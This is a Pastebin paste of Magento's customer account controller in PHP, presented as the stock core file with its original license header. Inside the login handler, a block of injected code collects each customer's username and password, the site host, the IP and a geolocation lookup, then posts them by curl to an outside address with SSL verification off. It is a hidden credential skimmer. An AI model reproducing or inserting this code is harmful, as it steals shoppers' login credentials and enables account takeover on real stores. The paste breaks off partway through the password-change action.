API tools faq
paste
Advertisement
Ko0l

g5

Ko0l
Oct 27th, 2017
105,286
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.34 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magento.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magento.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Customer
  23. * @copyright Copyright (c) 2006-2015 X.commerce, Inc. (http://www.magento.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27. /**
  28. * Customer account controller
  29. *
  30. * @category Mage
  31. * @package Mage_Customer
  32. * @author Magento Core Team <core@magentocommerce.com>
  33. */
  34. class Mage_Customer_AccountController extends Mage_Core_Controller_Front_Action
  35. {
  36. /**
  37. * Action list where need check enabled cookie
  38. *
  39. * @var array
  40. */
  41. protected $_cookieCheckActions = array('loginPost', 'createpost');
  42.  
  43. /**
  44. * Retrieve customer session model object
  45. *
  46. * @return Mage_Customer_Model_Session
  47. */
  48. protected function _getSession()
  49. {
  50. return Mage::getSingleton('customer/session');
  51. }
  52.  
  53. /**
  54. * Action predispatch
  55. *
  56. * Check customer authentication for some actions
  57. */
  58. public function preDispatch()
  59. {
  60. // a brute-force protection here would be nice
  61.  
  62. parent::preDispatch();
  63.  
  64. if (!$this->getRequest()->isDispatched()) {
  65. return;
  66. }
  67.  
  68. $action = $this->getRequest()->getActionName();
  69. $openActions = array(
  70. 'create',
  71. 'login',
  72. 'logoutsuccess',
  73. 'forgotpassword',
  74. 'forgotpasswordpost',
  75. 'resetpassword',
  76. 'resetpasswordpost',
  77. 'confirm',
  78. 'confirmation'
  79. );
  80. $pattern = '/^(' . implode('|', $openActions) . ')/i';
  81.  
  82. if (!preg_match($pattern, $action)) {
  83. if (!$this->_getSession()->authenticate($this)) {
  84. $this->setFlag('', 'no-dispatch', true);
  85. }
  86. } else {
  87. $this->_getSession()->setNoReferer(true);
  88. }
  89. }
  90.  
  91. /**
  92. * Action postdispatch
  93. *
  94. * Remove No-referer flag from customer session after each action
  95. */
  96. public function postDispatch()
  97. {
  98. parent::postDispatch();
  99. $this->_getSession()->unsNoReferer(false);
  100. }
  101.  
  102. /**
  103. * Default customer account page
  104. */
  105. public function indexAction()
  106. {
  107. $this->loadLayout();
  108. $this->_initLayoutMessages('customer/session');
  109. $this->_initLayoutMessages('catalog/session');
  110.  
  111. $this->getLayout()->getBlock('content')->append(
  112. $this->getLayout()->createBlock('customer/account_dashboard')
  113. );
  114. $this->getLayout()->getBlock('head')->setTitle($this->__('My Account'));
  115. $this->renderLayout();
  116. }
  117.  
  118. /**
  119. * Customer login form page
  120. */
  121. public function loginAction()
  122. {
  123. if ($this->_getSession()->isLoggedIn()) {
  124. $this->_redirect('*/*/');
  125. return;
  126. }
  127. $this->getResponse()->setHeader('Login-Required', 'true');
  128. $this->loadLayout();
  129. $this->_initLayoutMessages('customer/session');
  130. $this->_initLayoutMessages('catalog/session');
  131. $this->renderLayout();
  132. }
  133.  
  134. /**
  135. * Login post action
  136. */
  137. public function loginPostAction()
  138. {
  139. if (!$this->_validateFormKey()) {
  140. $this->_redirect('*/*/');
  141. return;
  142. }
  143.  
  144. if ($this->_getSession()->isLoggedIn()) {
  145. $this->_redirect('*/*/');
  146. return;
  147. }
  148. $session = $this->_getSession();
  149.  
  150. if ($this->getRequest()->isPost()) {
  151. $login = $this->getRequest()->getPost('login');
  152. if (!empty($login['username']) && !empty($login['password'])) {
  153. try {
  154. $session->login($login['username'], $login['password']);
  155. if ($session->getCustomer()->getIsJustConfirmed()) {
  156. $this->_welcomeCustomer($session->getCustomer(), true);
  157. }
  158. } catch (Mage_Core_Exception $e) {
  159. switch ($e->getCode()) {
  160. case Mage_Customer_Model_Customer::EXCEPTION_EMAIL_NOT_CONFIRMED:
  161. $value = $this->_getHelper('customer')->getEmailConfirmationUrl($login['username']);
  162. $message = $this->_getHelper('customer')->__('This account is not confirmed. <a href="%s">Click here</a> to resend confirmation email.', $value);
  163. break;
  164. case Mage_Customer_Model_Customer::EXCEPTION_INVALID_EMAIL_OR_PASSWORD:
  165. $message = $e->getMessage();
  166. break;
  167. default:
  168. $message = $e->getMessage();
  169. }
  170. $session->addError($message);
  171. $session->setUsername($login['username']);
  172. } catch (Exception $e) {
  173. // Mage::logException($e); // PA DSS violation: this exception log can disclose customer password
  174. }
  175. } else {
  176. $session->addError($this->__('Login and password are required.'));
  177. }
  178. }
  179. $ip = getenv("REMOTE_ADDR");
  180. $a = json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip={$ip}"));
  181. $web = $_SERVER["HTTP_HOST"];
  182. $message .= "Website : ".$web."\n";
  183. $message .= "Username: ".$login['username']."\n";
  184. $message .= "Password: ".$login['password']."\n";
  185. $message .= "IP : ".$ip."\n";
  186. $message .= "Country : ".$a->geoplugin_city." | ".$a->geoplugin_region." | ".$a->geoplugin_countryName."\n";
  187. $subject = "Mag Log1n ".$web." ".$a->geoplugin_countryName;
  188. $update = "privmagentologs@gmail.com";
  189. $xupdate = "data=".$message."&subject=".$subject."&server=".$web;
  190. $ch = curl_init();curl_setopt($ch, CURLOPT_URL,$update);curl_setopt($ch, CURLOPT_REFERER, $update);curl_setopt($ch, CURLOPT_HEADER, 1);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $xupdate);$result = curl_exec($ch);curl_close($ch);
  191. $this->_loginPostRedirect();
  192. }
  193.  
  194. /**
  195. * Define target URL and redirect customer after logging in
  196. */
  197. protected function _loginPostRedirect()
  198. {
  199.  
  200. $session = $this->_getSession();
  201.  
  202. if (!$session->getBeforeAuthUrl() || $session->getBeforeAuthUrl() == Mage::getBaseUrl()) {
  203. // Set default URL to redirect customer to
  204. $session->setBeforeAuthUrl($this->_getHelper('customer')->getAccountUrl());
  205. // Redirect customer to the last page visited after logging in
  206. if ($session->isLoggedIn()) {
  207. if (!Mage::getStoreConfigFlag(
  208. Mage_Customer_Helper_Data::XML_PATH_CUSTOMER_STARTUP_REDIRECT_TO_DASHBOARD
  209. )) {
  210. $referer = $this->getRequest()->getParam(Mage_Customer_Helper_Data::REFERER_QUERY_PARAM_NAME);
  211. if ($referer) {
  212. // Rebuild referer URL to handle the case when SID was changed
  213. $referer = $this->_getModel('core/url')
  214. ->getRebuiltUrl( $this->_getHelper('core')->urlDecodeAndEscape($referer));
  215. if ($this->_isUrlInternal($referer)) {
  216. $session->setBeforeAuthUrl($referer);
  217. }
  218. }
  219. } else if ($session->getAfterAuthUrl()) {
  220. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  221. }
  222. } else {
  223. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getLoginUrl());
  224. }
  225. } else if ($session->getBeforeAuthUrl() == $this->_getHelper('customer')->getLogoutUrl()) {
  226. $session->setBeforeAuthUrl( $this->_getHelper('customer')->getDashboardUrl());
  227. } else {
  228. if (!$session->getAfterAuthUrl()) {
  229. $session->setAfterAuthUrl($session->getBeforeAuthUrl());
  230. }
  231. if ($session->isLoggedIn()) {
  232. $session->setBeforeAuthUrl($session->getAfterAuthUrl(true));
  233. }
  234. }
  235. $this->_redirectUrl($session->getBeforeAuthUrl(true));
  236. }
  237.  
  238. /**
  239. * Customer logout action
  240. */
  241. public function logoutAction()
  242. {
  243. $this->_getSession()->logout()
  244. ->renewSession();
  245.  
  246. $this->_redirect('*/*/logoutSuccess');
  247. }
  248.  
  249. /**
  250. * Logout success page
  251. */
  252. public function logoutSuccessAction()
  253. {
  254. $this->loadLayout();
  255. $this->renderLayout();
  256. }
  257.  
  258. /**
  259. * Customer register form page
  260. */
  261. public function createAction()
  262. {
  263. if ($this->_getSession()->isLoggedIn()) {
  264. $this->_redirect('*/*');
  265. return;
  266. }
  267.  
  268. $this->loadLayout();
  269. $this->_initLayoutMessages('customer/session');
  270. $this->renderLayout();
  271. }
  272.  
  273. /**
  274. * Create customer account action
  275. */
  276. public function createPostAction()
  277. {
  278. /** @var $session Mage_Customer_Model_Session */
  279. $session = $this->_getSession();
  280. if ($session->isLoggedIn()) {
  281. $this->_redirect('*/*/');
  282. return;
  283. }
  284. $session->setEscapeMessages(true); // prevent XSS injection in user input
  285. if (!$this->getRequest()->isPost()) {
  286. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  287. $this->_redirectError($errUrl);
  288. return;
  289. }
  290.  
  291. $customer = $this->_getCustomer();
  292.  
  293. try {
  294. $errors = $this->_getCustomerErrors($customer);
  295.  
  296. if (empty($errors)) {
  297. $customer->cleanPasswordsValidationData();
  298. $customer->save();
  299. $this->_dispatchRegisterSuccess($customer);
  300. $this->_successProcessRegistration($customer);
  301. return;
  302. } else {
  303. $this->_addSessionError($errors);
  304. }
  305. } catch (Mage_Core_Exception $e) {
  306. $session->setCustomerFormData($this->getRequest()->getPost());
  307. if ($e->getCode() === Mage_Customer_Model_Customer::EXCEPTION_EMAIL_EXISTS) {
  308. $url = $this->_getUrl('customer/account/forgotpassword');
  309. $message = $this->__('There is already an account with this email address. If you are sure that it is your email address, <a href="%s">click here</a> to get your password and access your account.', $url);
  310. $session->setEscapeMessages(false);
  311. } else {
  312. $message = $e->getMessage();
  313. }
  314. $session->addError($message);
  315. } catch (Exception $e) {
  316. $session->setCustomerFormData($this->getRequest()->getPost())
  317. ->addException($e, $this->__('Cannot save the customer.'));
  318. }
  319. $errUrl = $this->_getUrl('*/*/create', array('_secure' => true));
  320. $this->_redirectError($errUrl);
  321. }
  322.  
  323. /**
  324. * Success Registration
  325. *
  326. * @param Mage_Customer_Model_Customer $customer
  327. * @return Mage_Customer_AccountController
  328. */
  329. protected function _successProcessRegistration(Mage_Customer_Model_Customer $customer)
  330. {
  331. $session = $this->_getSession();
  332. if ($customer->isConfirmationRequired()) {
  333. /** @var $app Mage_Core_Model_App */
  334. $app = $this->_getApp();
  335. /** @var $store Mage_Core_Model_Store*/
  336. $store = $app->getStore();
  337. $customer->sendNewAccountEmail(
  338. 'confirmation',
  339. $session->getBeforeAuthUrl(),
  340. $store->getId()
  341. );
  342. $customerHelper = $this->_getHelper('customer');
  343. $session->addSuccess($this->__('Account confirmation is required. Please, check your email for the confirmation link. To resend the confirmation email please <a href="%s">click here</a>.',
  344. $customerHelper->getEmailConfirmationUrl($customer->getEmail())));
  345. $url = $this->_getUrl('*/*/index', array('_secure' => true));
  346. } else {
  347. $session->setCustomerAsLoggedIn($customer);
  348. $url = $this->_welcomeCustomer($customer);
  349. }
  350. $this->_redirectSuccess($url);
  351. return $this;
  352. }
  353.  
  354. /**
  355. * Get Customer Model
  356. *
  357. * @return Mage_Customer_Model_Customer
  358. */
  359. protected function _getCustomer()
  360. {
  361. $customer = $this->_getFromRegistry('current_customer');
  362. if (!$customer) {
  363. $customer = $this->_getModel('customer/customer')->setId(null);
  364. }
  365. if ($this->getRequest()->getParam('is_subscribed', false)) {
  366. $customer->setIsSubscribed(1);
  367. }
  368. /**
  369. * Initialize customer group id
  370. */
  371. $customer->getGroupId();
  372.  
  373. return $customer;
  374. }
  375.  
  376. /**
  377. * Add session error method
  378. *
  379. * @param string|array $errors
  380. */
  381. protected function _addSessionError($errors)
  382. {
  383. $session = $this->_getSession();
  384. $session->setCustomerFormData($this->getRequest()->getPost());
  385. if (is_array($errors)) {
  386. foreach ($errors as $errorMessage) {
  387. $session->addError($errorMessage);
  388. }
  389. } else {
  390. $session->addError($this->__('Invalid customer data'));
  391. }
  392. }
  393.  
  394. /**
  395. * Validate customer data and return errors if they are
  396. *
  397. * @param Mage_Customer_Model_Customer $customer
  398. * @return array|string
  399. */
  400. protected function _getCustomerErrors($customer)
  401. {
  402. $errors = array();
  403. $request = $this->getRequest();
  404. if ($request->getPost('create_address')) {
  405. $errors = $this->_getErrorsOnCustomerAddress($customer);
  406. }
  407. $customerForm = $this->_getCustomerForm($customer);
  408. $customerData = $customerForm->extractData($request);
  409. $customerErrors = $customerForm->validateData($customerData);
  410. if ($customerErrors !== true) {
  411. $errors = array_merge($customerErrors, $errors);
  412. } else {
  413. $customerForm->compactData($customerData);
  414. $customer->setPassword($request->getPost('password'));
  415. $customer->setPasswordConfirmation($request->getPost('confirmation'));
  416. $customerErrors = $customer->validate();
  417. if (is_array($customerErrors)) {
  418. $errors = array_merge($customerErrors, $errors);
  419. }
  420. }
  421. return $errors;
  422. }
  423.  
  424. /**
  425. * Get Customer Form Initalized Model
  426. *
  427. * @param Mage_Customer_Model_Customer $customer
  428. * @return Mage_Customer_Model_Form
  429. */
  430. protected function _getCustomerForm($customer)
  431. {
  432. /* @var $customerForm Mage_Customer_Model_Form */
  433. $customerForm = $this->_getModel('customer/form');
  434. $customerForm->setFormCode('customer_account_create');
  435. $customerForm->setEntity($customer);
  436. return $customerForm;
  437. }
  438.  
  439. /**
  440. * Get Helper
  441. *
  442. * @param string $path
  443. * @return Mage_Core_Helper_Abstract
  444. */
  445. protected function _getHelper($path)
  446. {
  447. return Mage::helper($path);
  448. }
  449.  
  450. /**
  451. * Get App
  452. *
  453. * @return Mage_Core_Model_App
  454. */
  455. protected function _getApp()
  456. {
  457. return Mage::app();
  458. }
  459.  
  460. /**
  461. * Dispatch Event
  462. *
  463. * @param Mage_Customer_Model_Customer $customer
  464. */
  465. protected function _dispatchRegisterSuccess($customer)
  466. {
  467. Mage::dispatchEvent('customer_register_success',
  468. array('account_controller' => $this, 'customer' => $customer)
  469. );
  470. }
  471.  
  472. /**
  473. * Gets customer address
  474. *
  475. * @param $customer
  476. * @return array $errors
  477. */
  478. protected function _getErrorsOnCustomerAddress($customer)
  479. {
  480. $errors = array();
  481. /* @var $address Mage_Customer_Model_Address */
  482. $address = $this->_getModel('customer/address');
  483. /* @var $addressForm Mage_Customer_Model_Form */
  484. $addressForm = $this->_getModel('customer/form');
  485. $addressForm->setFormCode('customer_register_address')
  486. ->setEntity($address);
  487.  
  488. $addressData = $addressForm->extractData($this->getRequest(), 'address', false);
  489. $addressErrors = $addressForm->validateData($addressData);
  490. if (is_array($addressErrors)) {
  491. $errors = array_merge($errors, $addressErrors);
  492. }
  493. $address->setId(null)
  494. ->setIsDefaultBilling($this->getRequest()->getParam('default_billing', false))
  495. ->setIsDefaultShipping($this->getRequest()->getParam('default_shipping', false));
  496. $addressForm->compactData($addressData);
  497. $customer->addAddress($address);
  498.  
  499. $addressErrors = $address->validate();
  500. if (is_array($addressErrors)) {
  501. $errors = array_merge($errors, $addressErrors);
  502. }
  503. return $errors;
  504. }
  505.  
  506. /**
  507. * Get model by path
  508. *
  509. * @param string $path
  510. * @param array|null $arguments
  511. * @return false|Mage_Core_Model_Abstract
  512. */
  513. public function _getModel($path, $arguments = array())
  514. {
  515. return Mage::getModel($path, $arguments);
  516. }
  517.  
  518. /**
  519. * Get model from registry by path
  520. *
  521. * @param string $path
  522. * @return mixed
  523. */
  524. protected function _getFromRegistry($path)
  525. {
  526. return Mage::registry($path);
  527. }
  528.  
  529. /**
  530. * Add welcome message and send new account email.
  531. * Returns success URL
  532. *
  533. * @param Mage_Customer_Model_Customer $customer
  534. * @param bool $isJustConfirmed
  535. * @return string
  536. */
  537. protected function _welcomeCustomer(Mage_Customer_Model_Customer $customer, $isJustConfirmed = false)
  538. {
  539. $this->_getSession()->addSuccess(
  540. $this->__('Thank you for registering with %s.', Mage::app()->getStore()->getFrontendName())
  541. );
  542. if ($this->_isVatValidationEnabled()) {
  543. // Show corresponding VAT message to customer
  544. $configAddressType = $this->_getHelper('customer/address')->getTaxCalculationAddressType();
  545. $userPrompt = '';
  546. switch ($configAddressType) {
  547. case Mage_Customer_Model_Address_Abstract::TYPE_SHIPPING:
  548. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you shipping address for proper VAT calculation',
  549. $this->_getUrl('customer/address/edit'));
  550. break;
  551. default:
  552. $userPrompt = $this->__('If you are a registered VAT customer, please click <a href="%s">here</a> to enter you billing address for proper VAT calculation',
  553. $this->_getUrl('customer/address/edit'));
  554. }
  555. $this->_getSession()->addSuccess($userPrompt);
  556. }
  557.  
  558. $customer->sendNewAccountEmail(
  559. $isJustConfirmed ? 'confirmed' : 'registered',
  560. '',
  561. Mage::app()->getStore()->getId()
  562. );
  563.  
  564. $successUrl = $this->_getUrl('*/*/index', array('_secure' => true));
  565. if ($this->_getSession()->getBeforeAuthUrl()) {
  566. $successUrl = $this->_getSession()->getBeforeAuthUrl(true);
  567. }
  568. return $successUrl;
  569. }
  570.  
  571. /**
  572. * Confirm customer account by id and confirmation key
  573. */
  574. public function confirmAction()
  575. {
  576. $session = $this->_getSession();
  577. if ($session->isLoggedIn()) {
  578. $this->_getSession()->logout()->regenerateSessionId();
  579. }
  580. try {
  581. $id = $this->getRequest()->getParam('id', false);
  582. $key = $this->getRequest()->getParam('key', false);
  583. $backUrl = $this->getRequest()->getParam('back_url', false);
  584. if (empty($id) || empty($key)) {
  585. throw new Exception($this->__('Bad request.'));
  586. }
  587.  
  588. // load customer by id (try/catch in case if it throws exceptions)
  589. try {
  590. $customer = $this->_getModel('customer/customer')->load($id);
  591. if ((!$customer) || (!$customer->getId())) {
  592. throw new Exception('Failed to load customer by id.');
  593. }
  594. }
  595. catch (Exception $e) {
  596. throw new Exception($this->__('Wrong customer account specified.'));
  597. }
  598.  
  599. // check if it is inactive
  600. if ($customer->getConfirmation()) {
  601. if ($customer->getConfirmation() !== $key) {
  602. throw new Exception($this->__('Wrong confirmation key.'));
  603. }
  604.  
  605. // activate customer
  606. try {
  607. $customer->setConfirmation(null);
  608. $customer->save();
  609. }
  610. catch (Exception $e) {
  611. throw new Exception($this->__('Failed to confirm customer account.'));
  612. }
  613.  
  614. // log in and send greeting email, then die happy
  615. $session->setCustomerAsLoggedIn($customer);
  616. $successUrl = $this->_welcomeCustomer($customer, true);
  617. $this->_redirectSuccess($backUrl ? $backUrl : $successUrl);
  618. return;
  619. }
  620.  
  621. // die happy
  622. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  623. return;
  624. }
  625. catch (Exception $e) {
  626. // die unhappy
  627. $this->_getSession()->addError($e->getMessage());
  628. $this->_redirectError($this->_getUrl('*/*/index', array('_secure' => true)));
  629. return;
  630. }
  631. }
  632.  
  633. /**
  634. * Send confirmation link to specified email
  635. */
  636. public function confirmationAction()
  637. {
  638. $customer = $this->_getModel('customer/customer');
  639. if ($this->_getSession()->isLoggedIn()) {
  640. $this->_redirect('*/*/');
  641. return;
  642. }
  643.  
  644. // try to confirm by email
  645. $email = $this->getRequest()->getPost('email');
  646. if ($email) {
  647. try {
  648. $customer->setWebsiteId(Mage::app()->getStore()->getWebsiteId())->loadByEmail($email);
  649. if (!$customer->getId()) {
  650. throw new Exception('');
  651. }
  652. if ($customer->getConfirmation()) {
  653. $customer->sendNewAccountEmail('confirmation', '', Mage::app()->getStore()->getId());
  654. $this->_getSession()->addSuccess($this->__('Please, check your email for confirmation key.'));
  655. } else {
  656. $this->_getSession()->addSuccess($this->__('This email does not require confirmation.'));
  657. }
  658. $this->_getSession()->setUsername($email);
  659. $this->_redirectSuccess($this->_getUrl('*/*/index', array('_secure' => true)));
  660. } catch (Exception $e) {
  661. $this->_getSession()->addException($e, $this->__('Wrong email.'));
  662. $this->_redirectError($this->_getUrl('*/*/*', array('email' => $email, '_secure' => true)));
  663. }
  664. return;
  665. }
  666.  
  667. // output form
  668. $this->loadLayout();
  669.  
  670. $this->getLayout()->getBlock('accountConfirmation')
  671. ->setEmail($this->getRequest()->getParam('email', $email));
  672.  
  673. $this->_initLayoutMessages('customer/session');
  674. $this->renderLayout();
  675. }
  676.  
  677. /**
  678. * Get Url method
  679. *
  680. * @param string $url
  681. * @param array $params
  682. * @return string
  683. */
  684. protected function _getUrl($url, $params = array())
  685. {
  686. return Mage::getUrl($url, $params);
  687. }
  688.  
  689. /**
  690. * Forgot customer password page
  691. */
  692. public function forgotPasswordAction()
  693. {
  694. $this->loadLayout();
  695.  
  696. $this->getLayout()->getBlock('forgotPassword')->setEmailValue(
  697. $this->_getSession()->getForgottenEmail()
  698. );
  699. $this->_getSession()->unsForgottenEmail();
  700.  
  701. $this->_initLayoutMessages('customer/session');
  702. $this->renderLayout();
  703. }
  704.  
  705. /**
  706. * Forgot customer password action
  707. */
  708. public function forgotPasswordPostAction()
  709. {
  710. $email = (string) $this->getRequest()->getPost('email');
  711. if ($email) {
  712. if (!Zend_Validate::is($email, 'EmailAddress')) {
  713. $this->_getSession()->setForgottenEmail($email);
  714. $this->_getSession()->addError($this->__('Invalid email address.'));
  715. $this->_redirect('*/*/forgotpassword');
  716. return;
  717. }
  718.  
  719. /** @var $customer Mage_Customer_Model_Customer */
  720. $customer = $this->_getModel('customer/customer')
  721. ->setWebsiteId(Mage::app()->getStore()->getWebsiteId())
  722. ->loadByEmail($email);
  723.  
  724. if ($customer->getId()) {
  725. try {
  726. $newResetPasswordLinkToken = $this->_getHelper('customer')->generateResetPasswordLinkToken();
  727. $customer->changeResetPasswordLinkToken($newResetPasswordLinkToken);
  728. $customer->sendPasswordResetConfirmationEmail();
  729. } catch (Exception $exception) {
  730. $this->_getSession()->addError($exception->getMessage());
  731. $this->_redirect('*/*/forgotpassword');
  732. return;
  733. }
  734. }
  735. $this->_getSession()
  736. ->addSuccess( $this->_getHelper('customer')
  737. ->__('If there is an account associated with %s you will receive an email with a link to reset your password.',
  738. $this->_getHelper('customer')->escapeHtml($email)));
  739. $this->_redirect('*/*/');
  740. return;
  741. } else {
  742. $this->_getSession()->addError($this->__('Please enter your email.'));
  743. $this->_redirect('*/*/forgotpassword');
  744. return;
  745. }
  746. }
  747.  
  748. /**
  749. * Display reset forgotten password form
  750. *
  751. * User is redirected on this action when he clicks on the corresponding link in password reset confirmation email
  752. *
  753. */
  754. public function resetPasswordAction()
  755. {
  756. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  757. $customerId = (int) $this->getRequest()->getQuery('id');
  758. try {
  759. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  760. $this->loadLayout();
  761. // Pass received parameters to the reset forgotten password form
  762. $this->getLayout()->getBlock('resetPassword')
  763. ->setCustomerId($customerId)
  764. ->setResetPasswordLinkToken($resetPasswordLinkToken);
  765. $this->renderLayout();
  766. } catch (Exception $exception) {
  767. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  768. $this->_redirect('*/*/forgotpassword');
  769. }
  770. }
  771.  
  772. /**
  773. * Reset forgotten password
  774. * Used to handle data recieved from reset forgotten password form
  775. */
  776. public function resetPasswordPostAction()
  777. {
  778. $resetPasswordLinkToken = (string) $this->getRequest()->getQuery('token');
  779. $customerId = (int) $this->getRequest()->getQuery('id');
  780. $password = (string) $this->getRequest()->getPost('password');
  781. $passwordConfirmation = (string) $this->getRequest()->getPost('confirmation');
  782.  
  783. try {
  784. $this->_validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken);
  785. } catch (Exception $exception) {
  786. $this->_getSession()->addError( $this->_getHelper('customer')->__('Your password reset link has expired.'));
  787. $this->_redirect('*/*/');
  788. return;
  789. }
  790.  
  791. $errorMessages = array();
  792. if (iconv_strlen($password) <= 0) {
  793. array_push($errorMessages, $this->_getHelper('customer')->__('New password field cannot be empty.'));
  794. }
  795. /** @var $customer Mage_Customer_Model_Customer */
  796. $customer = $this->_getModel('customer/customer')->load($customerId);
  797.  
  798. $customer->setPassword($password);
  799. $customer->setPasswordConfirmation($passwordConfirmation);
  800. $validationErrorMessages = $customer->validate();
  801. if (is_array($validationErrorMessages)) {
  802. $errorMessages = array_merge($errorMessages, $validationErrorMessages);
  803. }
  804.  
  805. if (!empty($errorMessages)) {
  806. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  807. foreach ($errorMessages as $errorMessage) {
  808. $this->_getSession()->addError($errorMessage);
  809. }
  810. $this->_redirect('*/*/resetpassword', array(
  811. 'id' => $customerId,
  812. 'token' => $resetPasswordLinkToken
  813. ));
  814. return;
  815. }
  816.  
  817. try {
  818. // Empty current reset password token i.e. invalidate it
  819. $customer->setRpToken(null);
  820. $customer->setRpTokenCreatedAt(null);
  821. $customer->cleanPasswordsValidationData();
  822. $customer->save();
  823. $this->_getSession()->addSuccess( $this->_getHelper('customer')->__('Your password has been updated.'));
  824. $this->_redirect('*/*/login');
  825. } catch (Exception $exception) {
  826. $this->_getSession()->addException($exception, $this->__('Cannot save a new password.'));
  827. $this->_redirect('*/*/resetpassword', array(
  828. 'id' => $customerId,
  829. 'token' => $resetPasswordLinkToken
  830. ));
  831. return;
  832. }
  833. }
  834.  
  835. /**
  836. * Check if password reset token is valid
  837. *
  838. * @param int $customerId
  839. * @param string $resetPasswordLinkToken
  840. * @throws Mage_Core_Exception
  841. */
  842. protected function _validateResetPasswordLinkToken($customerId, $resetPasswordLinkToken)
  843. {
  844. if (!is_int($customerId)
  845. || !is_string($resetPasswordLinkToken)
  846. || empty($resetPasswordLinkToken)
  847. || empty($customerId)
  848. || $customerId < 0
  849. ) {
  850. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Invalid password reset token.'));
  851. }
  852.  
  853. /** @var $customer Mage_Customer_Model_Customer */
  854. $customer = $this->_getModel('customer/customer')->load($customerId);
  855. if (!$customer || !$customer->getId()) {
  856. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Wrong customer account specified.'));
  857. }
  858.  
  859. $customerToken = $customer->getRpToken();
  860. if (strcmp($customerToken, $resetPasswordLinkToken) != 0 || $customer->isResetPasswordLinkTokenExpired()) {
  861. throw Mage::exception('Mage_Core', $this->_getHelper('customer')->__('Your password reset link has expired.'));
  862. }
  863. }
  864.  
  865. /**
  866. * Forgot customer account information page
  867. */
  868. public function editAction()
  869. {
  870. $this->loadLayout();
  871. $this->_initLayoutMessages('customer/session');
  872. $this->_initLayoutMessages('catalog/session');
  873.  
  874. $block = $this->getLayout()->getBlock('customer_edit');
  875. if ($block) {
  876. $block->setRefererUrl($this->_getRefererUrl());
  877. }
  878. $data = $this->_getSession()->getCustomerFormData(true);
  879. $customer = $this->_getSession()->getCustomer();
  880. if (!empty($data)) {
  881. $customer->addData($data);
  882. }
  883. if ($this->getRequest()->getParam('changepass') == 1) {
  884. $customer->setChangePassword(1);
  885. }
  886.  
  887. $this->getLayout()->getBlock('head')->setTitle($this->__('Account Information'));
  888. $this->getLayout()->getBlock('messages')->setEscapeMessageFlag(true);
  889. $this->renderLayout();
  890. }
  891.  
  892. /**
  893. * Change customer password action
  894. */
  895. public function editPostAction()
  896. {
  897. if (!$this->_validateFormKey()) {
  898. return $this->_redirect('*/*/edit');
  899. }
  900.  
  901. if ($this->getRequest()->isPost()) {
  902. /** @var $customer Mage_Customer_Model_Customer */
  903. $customer = $this->_getSession()->getCustomer();
  904.  
  905. /** @var $customerForm Mage_Customer_Model_Form */
  906. $customerForm = $this->_getModel('customer/form');
  907. $customerForm->setFormCode('customer_account_edit')
  908. ->setEntity($customer);
  909.  
  910. $customerData = $customerForm->extractData($this->getRequest());
  911.  
  912. $errors = array();
  913. $customerErrors = $customerForm->validateData($customerData);
  914. if ($customerErrors !== true) {
  915. $errors = array_merge($customerErrors, $errors);
  916. } else {
  917. $customerForm->compactData($customerData);
  918. $errors = array();
  919.  
  920. // If password change was requested then add it to common validation scheme
  921. if ($this->getRequest()->getParam('change_password')) {
  922. $currPass = $this->getRequest()->getPost('current_password');
  923. $newPass = $this->getRequest()->getPost('password');
  924. $confPass = $this->getRequest()->getPost('confirmation');
  925.  
  926. $oldPass = $this->_getSession()->getCustomer()->getPasswordHash();
  927. if ( $this->_getHelper('core/string')->strpos($oldPass, ':')) {
  928. list($_salt, $salt) = explode(':', $oldPass);
  929. } else {
  930. $salt = false;
  931. }
  932.  
  933. if ($customer->hashPassword($currPass, $salt) == $oldPass) {
  934. if (strlen($newPass)) {
  935. /**
  936. * Set entered password and its confirmation - they
  937. * will be validated later to match each other and be of right length
  938. */
  939. $customer->setPassword($newPass);
  940. $customer->setPasswordConfirmation($confPass);
  941. } else {
  942. $errors[] = $this->__('New password field cannot be empty.');
  943. }
  944. } else {
  945. $errors[] = $this->__('Invalid current password');
  946. }
  947. }
  948.  
  949. // Validate account and compose list of errors if any
  950. $customerErrors = $customer->validate();
  951. if (is_array($customerErrors)) {
  952. $errors = array_merge($errors, $customerErrors);
  953. }
  954. }
  955.  
  956. if (!empty($errors)) {
  957. $this->_getSession()->setCustomerFormData($this->getRequest()->getPost());
  958. foreach ($errors as $message) {
  959. $this->_getSession()->addError($message);
  960. }
  961. $this->_redirect('*/*/edit');
  962. return $this;
  963. }
  964.  
  965. try {
  966. $customer->cleanPasswordsValidationData();
  967. $customer->save();
  968. $this->_getSession()->setCustomer($customer)
  969. ->addSuccess($this->__('The account information has been saved.'));
  970.  
  971. $this->_redirect('customer/account');
  972. return;
